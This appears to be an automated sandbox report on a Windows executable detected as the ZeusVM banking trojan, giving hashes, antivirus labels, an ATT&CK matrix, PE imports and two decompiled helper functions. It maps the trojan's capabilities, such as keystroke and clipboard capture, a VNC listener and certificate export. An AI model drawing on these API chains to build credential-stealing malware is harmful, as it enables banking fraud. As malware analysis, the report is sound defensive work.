Windows Analysis Report
dmB3aYi8Bo.bin

Overview

General Information

Sample Name:dmB3aYi8Bo.bin (renamed file extension from bin to exe)
Analysis ID:691233
MD5:56aa277081075438c3dbbef841299172
SHA1:e5870965f41cb82f454043845641ae92b6c6b939
SHA256:0eab1c5406f415f75ab39dbf3651cee9d41a0e0b6d5bdb51042412b57f0aea05
Tags:exeunnamed10
Infos:

Detection

ZeusVM
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected ZeusVM e-Banking Trojan
Contains VNC / remote desktop functionality (version string found)
Machine Learning detection for sample
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
May initialize a security null descriptor
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • dmB3aYi8Bo.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\dmB3aYi8Bo.exe" MD5: 56AA277081075438C3DBBEF841299172)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: dmB3aYi8Bo.exe; Avira: detected
Source: dmB3aYi8Bo.exe; Virustotal: Detection: 57%
Source: dmB3aYi8Bo.exe; ReversingLabs: Detection: 76%
Source: dmB3aYi8Bo.exe; Joe Sandbox ML: detected
Source: 0.0.dmB3aYi8Bo.exe.12b0000.0.unpack; Avira: Label: TR/Spy.Zbot.afkmx
Source: 0.2.dmB3aYi8Bo.exe.12b0000.0.unpack; Avira: Label: TR/Spy.Zbot.afkmx
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B48A2 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: dmB3aYi8Bo.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012BD399 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012BD44A FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B685D select,recv
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012CA854 GetKeyboardState,ToUnicode,TranslateMessage
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012CA8EB GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock

E-Banking Fraud

Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B30C0 lstrcmpiA,lstrcmpiA
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012D022B OpenDesktopW,CreateDesktopW
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C80B0 InitiateSystemShutdownExW,ExitWindowsEx
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C1A81 ExitWindowsEx
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B6177
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B636F
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B5B49
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B5D60
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B5F21
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C976D
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B1BC2
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012CAFE4
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B6601
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012BBAD7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C2BCD NtQueryInformationProcess,CloseHandle,NtCreateThread
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C2C77 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C2F67 CreateToolhelp32Snapshot,Process32FirstW,GetLengthSid,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_0-11836)
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B4E98 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B395D CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B3813 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore
Source: classification engine; Classification label: mal72.bank.troj.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B504C LoadLibraryW,GetProcAddress,FreeLibrary
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_0-11837)
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_0-11837)
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; API coverage: 1.9 %
Source: all processes; Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C105D mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B18F2 HeapCreate,GetProcessHeap
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C2D9E LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,LeaveCriticalSection
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B6FBD InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B3E69 GetTimeZoneInformation
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C7B5C GetVersionExW,GetNativeSystemInfo
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B1B1D PFXImportCertStore,GetSystemTime
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012C87ED GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW
Source: dmB3aYi8Bo.exe; Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

Source: dmB3aYi8Bo.exe; String found in binary or memory: RFB 003.003
Source: dmB3aYi8Bo.exe, 00000000.00000000.311521845.00000000012D7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: RFB 003.003
Source: dmB3aYi8Bo.exe, 00000000.00000000.311521845.00000000012D7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: ! RFB 003.003
Source: dmB3aYi8Bo.exe; String found in binary or memory: ! RFB 003.003
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B6A4C socket,bind,listen,closesocket
Source: C:\Users\user\Desktop\dmB3aYi8Bo.exe; Code function: 0_2_012B1929 socket,bind,closesocket
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
1
Valid Accounts
2
Command and Scripting Interpreter
1
Create Account
1
Valid Accounts
1
Valid Accounts
11
Input Capture
2
System Time Discovery
1
Remote Desktop Protocol
11
Input Capture
Exfiltration Over Other Network Medium2
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts21
Native API
1
Valid Accounts
11
Access Token Manipulation
11
Access Token Manipulation
LSASS Memory1
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
Exfiltration Over Bluetooth1
Remote Access Software
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Install Root Certificate
Security Account Manager1
Process Discovery
SMB/Windows Admin Shares1
Clipboard Data
Automated Exfiltration1
Ingress Tool Transfer
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Software Packing
NTDS1
Account Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Owner/User Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync3
System Information Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact


Source | Detection | Scanner | Label | Link
dmB3aYi8Bo.exe | 58% | Virustotal | | Browse
dmB3aYi8Bo.exe | 77% | ReversingLabs | Win32.Trojan.Zeus |
dmB3aYi8Bo.exe | 100% | Avira | TR/Spy.Zbot.afkmx |
dmB3aYi8Bo.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
0.0.dmB3aYi8Bo.exe.12b0000.0.unpack | 100% | Avira | TR/Spy.Zbot.afkmx | | Download File
0.2.dmB3aYi8Bo.exe.12b0000.0.unpack | 100% | Avira | TR/Spy.Zbot.afkmx | | Download File
No contacted domains info
No contacted IP infos
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:691233
Start date and time:2022-08-27 03:52:44 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 15s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:dmB3aYi8Bo.bin (renamed file extension from bin to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.bank.troj.winEXE@1/0@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 99.9% (good quality ratio 95.4%)
  • Quality average: 88.3%
  • Quality standard deviation: 24.3%
HCA Information:
  • Successful, ratio: 91%
  • Number of executed functions: 7
  • Number of non-executed functions: 115
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
  • Not all processes were analyzed, report is missing behavior information
No simulations
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.974490890199798
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:dmB3aYi8Bo.exe
File size:187392
MD5:56aa277081075438c3dbbef841299172
SHA1:e5870965f41cb82f454043845641ae92b6c6b939
SHA256:0eab1c5406f415f75ab39dbf3651cee9d41a0e0b6d5bdb51042412b57f0aea05
SHA512:6f128a1a9d8b1bb96bc7fa92fad1170395b1ce9603168fb1925bbeb1a5d910f0f8b5999eabdcd4b1dacae376d4ff479d878920984ba68d951a46ac7056b7ad69
SSDEEP:3072:bGVWrMNKUhjhoo7MQW/ieN6RzNLWV+1hpNaL+90tLsVXzJQYMUCb:bGArMNKUhjWl/ieNULu8h39SLSuYMUCb
TLSH:2E04BF3EB9D15877C86F213149E9B6B432EED730136A49C7E1CD0E0938529E2A739397
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......")..fH..fH..fH..fH..gH..o04.{H..fH..>I...>..zH...>:.gH..RichfH..................PE..L......N.................V.................
Icon Hash:00828e8e8686b000
Entrypoint:0x401a1e
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:0x4EF1CD9B [Wed Dec 21 12:14:19 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:f6a985405556b98acbdb7255917b9fb5
Programming Language:
  • [IMP] VS2008 SP1 build 30729
  • [C++] VS2010 build 30319
  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e000 | 0x12c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x31000 | 0x1350 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2e9f8 | 0x8cc | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x21f7b | 0x22000 | False | 0.48848948759191174 | data | 5.9162227847345825 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
code | 0x23000 | 0x35d1 | 0x3600 | False | 0.24254918981481483 | data | 3.993522758518666 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x27000 | 0x323c | 0x3400 | False | 0.6225961538461539 | data | 5.636797675605685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2b000 | 0x2a3a | 0x600 | False | 0.150390625 | PGP symmetric key encrypted data - Plaintext or unencrypted data | 1.1042325865513358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e000 | 0x2e8d | 0x3000 | False | 0.3174641927083333 | data | 4.73911940856972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x31000 | 0x1649 | 0x1800 | False | 0.6793619791666666 | data | 5.9673223528898065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | SystemTimeToFileTime, WideCharToMultiByte, MultiByteToWideChar, FormatMessageW, OpenProcess, CreateProcessW, FileTimeToDosDateTime, FileTimeToLocalFileTime, GetFileInformationByHandle, GetVolumeNameForVolumeMountPointW, GetOverlappedResult, RemoveDirectoryW, FindClose, FindNextFileW, FindFirstFileW, SetEndOfFile, GetEnvironmentVariableW, DuplicateHandle, CreateEventW, GetModuleFileNameW, SetErrorMode, GetVersionExW, GetCurrentProcessId, GetFileAttributesExW, SetEvent, OpenEventW, lstrcpyW, ExitProcess, MulDiv, InitializeCriticalSection, FlushFileBuffers, GetThreadContext, GetProcessId, LeaveCriticalSection, EnterCriticalSection, CreateRemoteThread, Process32NextW, Process32FirstW, DeleteCriticalSection, GetLocalTime, GetPrivateProfileStringW, GetPrivateProfileIntW, GetNativeSystemInfo, GetUserDefaultUILanguage, MoveFileExW, GlobalUnlock, GlobalLock, GetCurrentThreadId, TlsGetValue, TlsSetValue, TerminateProcess, ResetEvent, MapViewOfFile, CreateFileMappingW, TlsAlloc, UnmapViewOfFile, TlsFree, WaitForMultipleObjects, SetLastError, ExpandEnvironmentStringsW, GetFileAttributesW, CreateDirectoryW, GetFileTime, SetFileTime, GetTempPathW, GetTempFileNameW, SetFileAttributesW, LoadLibraryA, ReadFile, DeleteFileW, SetFilePointerEx, GetFileSizeEx, VirtualAlloc, VirtualFree, CreateFileW, SetFilePointer, WriteFile, VirtualFreeEx, IsBadReadPtr, VirtualAllocEx, VirtualProtectEx, ReadProcessMemory, WriteProcessMemory, SetThreadContext, VirtualQueryEx, OpenMutexW, ReleaseMutex, CreateMutexW, LocalFree, LoadLibraryW, FreeLibrary, CreateThread, GetModuleHandleW, GetProcAddress, GetLastError, CreateToolhelp32Snapshot, Thread32First, Thread32Next, CloseHandle, lstrcmpiW, Sleep, GetTickCount, GetTimeZoneInformation, HeapFree, HeapAlloc, HeapReAlloc, HeapDestroy, HeapCreate, GetProcessHeap, GetSystemTime, lstrcmpiA, GetCurrentThread, SetThreadPriority, GetCommandLineW, WaitForSingleObject
USER32.dll | RegisterClassA, RegisterClassExW, RegisterClassExA, CreateWindowStationW, OpenWindowStationW, SetProcessWindowStation, GetProcessWindowStation, CreateDesktopW, SetThreadDesktop, CloseWindowStation, CloseDesktop, GetUpdateRgn, GetUpdateRect, GetWindowDC, GetDCEx, EndPaint, BeginPaint, IntersectRect, EqualRect, CallWindowProcW, PrintWindow, PeekMessageA, GetMessageA, GetMessageW, GetCapture, ReleaseCapture, SetCapture, SetCursorPos, GetCursorPos, GetMessagePos, GetWindowInfo, GetAncestor, RegisterClassW, GetClassLongW, GetWindowRect, IsRectEmpty, GetParent, MapWindowPoints, SetWindowPos, IsWindow, DefMDIChildProcA, DefMDIChildProcW, DefFrameProcA, DefFrameProcW, DefDlgProcA, DefDlgProcW, DefWindowProcA, SwitchDesktop, OpenDesktopW, OpenInputDesktop, GetMenu, GetMenuItemCount, GetMenuState, HiliteMenuItem, MenuItemFromPoint, EndMenu, GetSubMenu, GetMenuItemRect, TrackPopupMenuEx, FillRect, GetMenuItemID, SetKeyboardState, GetShellWindow, SystemParametersInfoW, DrawEdge, GetUserObjectInformationW, GetWindowThreadProcessId, CallWindowProcA, RegisterWindowMessageW, GetClassNameW, PostThreadMessageW, DefWindowProcW, CharLowerBuffA, CharLowerW, CharLowerA, SendMessageW, MapVirtualKeyW, PostMessageW, GetSystemMetrics, GetClipboardData, GetKeyboardState, ToUnicode, ExitWindowsEx, CharToOemW, GetDC, ReleaseDC, LoadImageW, GetWindowTextLengthW, GetWindowTextW, WindowFromPoint, SendMessageTimeoutW, GetWindowLongW, SetWindowLongW, DispatchMessageW, TranslateMessage, PeekMessageW, MsgWaitForMultipleObjects, CharUpperW, GetWindow, GetTopWindow, GetThreadDesktop
ADVAPI32.dll | CryptReleaseContext, CryptDestroyHash, CryptGetHashParam, CryptHashData, CryptCreateHash, CryptAcquireContextW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, SetSecurityDescriptorSacl, GetSecurityDescriptorSacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, SetNamedSecurityInfoW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegSetValueExW, RegCreateKeyExW, CreateProcessAsUserW, GetLengthSid, ConvertSidToStringSidW, InitiateSystemShutdownExW
SHLWAPI.dll | PathIsURLW, PathQuoteSpacesW, PathRenameExtensionW, PathIsDirectoryW, PathMatchSpecW, UrlUnescapeA, PathAddBackslashW, PathRemoveBackslashW, PathRemoveFileSpecW, PathAddExtensionW, PathFindFileNameW, wvnsprintfA, wvnsprintfW, PathCombineW, PathUnquoteSpacesW, PathSkipRootW, StrCmpNIA, SHDeleteValueW, SHDeleteKeyW, PathIsRelativeW, StrCmpNIW
SHELL32.dll | ShellExecuteW, CommandLineToArgvW, SHGetFolderPathW
Secur32.dll | GetUserNameExW
PSAPI.DLL | EnumProcessModules, GetModuleBaseNameW, GetModuleFileNameExW
ole32.dll | CLSIDFromString, StringFromGUID2
GDI32.dll | RestoreDC, SetViewportOrgEx, SaveDC, GdiFlush, CreateCompatibleDC, SetRectRgn, SelectObject, CreateCompatibleBitmap, DeleteObject, CreateDIBSection, GetObjectW, GetDIBits, DeleteDC, CreateFontIndirectW, GetDeviceCaps
COMCTL32.dll | InitCommonControlsEx
WS2_32.dll | select, send, WSACleanup, WSAStartup, closesocket, connect, recvfrom, sendto, WSASend, getpeername, WSAStringToAddressW, WSAAddressToStringW, getsockname, WSAGetLastError, setsockopt, WSAIoctl, shutdown, accept, WSASetLastError, bind, listen, getaddrinfo, freeaddrinfo, recv, socket
CRYPT32.dll | CertDuplicateCertificateContext, CertDeleteCertificateFromStore, CertOpenSystemStoreW, CertEnumCertificatesInStore, PFXExportCertStoreEx, CertCloseStore, PFXImportCertStore
WININET.dll | GetUrlCacheEntryInfoW, HttpAddRequestHeadersW, HttpSendRequestW, HttpSendRequestExW, HttpSendRequestExA, InternetReadFileExA, InternetQueryDataAvailable, HttpAddRequestHeadersA, InternetCrackUrlA, InternetReadFile, InternetQueryOptionW, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetQueryOptionA, InternetOpenA, InternetSetOptionA, InternetConnectA, InternetCloseHandle, InternetSetStatusCallbackW
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
No network behavior found

Target ID:0
Start time:03:53:44
Start date:27/08/2022
Path:C:\Users\user\Desktop\dmB3aYi8Bo.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\dmB3aYi8Bo.exe"
Imagebase:0x12b0000
File size:187392 bytes
MD5 hash:56AA277081075438C3DBBEF841299172
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

    Execution Graph

    Execution Coverage:0.7%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:11.7%
    Total number of Nodes:103
    Total number of Limit Nodes:9

    Control-flow Graph

    C-Code - Quality: 79%
    			E012B6FBD(intOrPtr* __ecx, struct _SECURITY_DESCRIPTOR* __edx) {
    				signed int _v8;
    				struct _ACL* _v12;
    				int _v16;
    				int _v20;
    				void** _t19;
    				struct _SECURITY_DESCRIPTOR* _t30;
    				intOrPtr* _t31;
    
    				_t30 = __edx;
    				_t31 = __ecx;
    				if(InitializeSecurityDescriptor(__edx, 1) == 0 || SetSecurityDescriptorDacl(_t30, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					_push(0);
    					_t19 =  &_v8;
    					_push(_t19);
    					_push(1);
    					_push(L"S:(ML;;NRNWNX;;;LW)"); // executed
    					L012D23E8(); // executed
    					if(_t19 == 0) {
    						L6:
    						_v8 = _v8 | 0xffffffff;
    						L7:
    						if(_t31 != 0) {
    							 *_t31 = 0xc;
    							 *(_t31 + 4) = _t30;
    							 *((intOrPtr*)(_t31 + 8)) = 0;
    						}
    						return _v8;
    					}
    					_v12 = 0;
    					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(_t30, _v20, _v12, _v16) == 0) {
    						LocalFree(_v8);
    						goto L6;
    					} else {
    						goto L7;
    					}
    				}
    			}











    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 012B6FCD
    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,00000001), ref: 012B6FDE
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012B6FF4
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,00000001,00000000,00000000,?,00000001), ref: 012B700F
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,00000001,00000000,00000000,?,00000001), ref: 012B7023
    • LocalFree.KERNEL32(?,?,00000001,00000000,00000000,?,00000001), ref: 012B7030
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
    • String ID: S:(ML;;NRNWNX;;;LW)
    • API String ID: 2050860296-820036962
    • Opcode ID: c79e93b57b68e3b86b805cb2446b98885b9498a8b77a2b2bb060b9248986aa03
    • Instruction ID: 9e8865b129db0a76706872a7b46a9c16e027137702a7dc532ca1f672310a4832
    • Opcode Fuzzy Hash: c79e93b57b68e3b86b805cb2446b98885b9498a8b77a2b2bb060b9248986aa03
    • Instruction Fuzzy Hash: 5011467691020ABBEB219FE5DCC4EEEBBBCFB44780F15456AF651E1090D7719A009B60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 75 12b18f2-12b3bbb HeapCreate 77 12b3bbd-12b3bcf GetProcessHeap 75->77 78 12b3bd0-12b3bd7 75->78
    C-Code - Quality: 100%
    			E012B18F2(long __ecx) {
    				void* _t1;
    				void* _t2;
    
    				_t1 = HeapCreate(0, __ecx, 0); // executed
    				 *0x12dc348 = _t1;
    				if(_t1 != 0) {
    					 *0x12dc341 = 1;
    					return _t1;
    				} else {
    					_t2 = GetProcessHeap();
    					 *0x12dc348 = _t2;
    					 *0x12dc341 = 0;
    					return _t2;
    				}
    			}






    APIs
    • HeapCreate.KERNELBASE(00000000,?,00000000), ref: 012B3BAE
    • GetProcessHeap.KERNEL32(?,00000000), ref: 012B3BBD
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
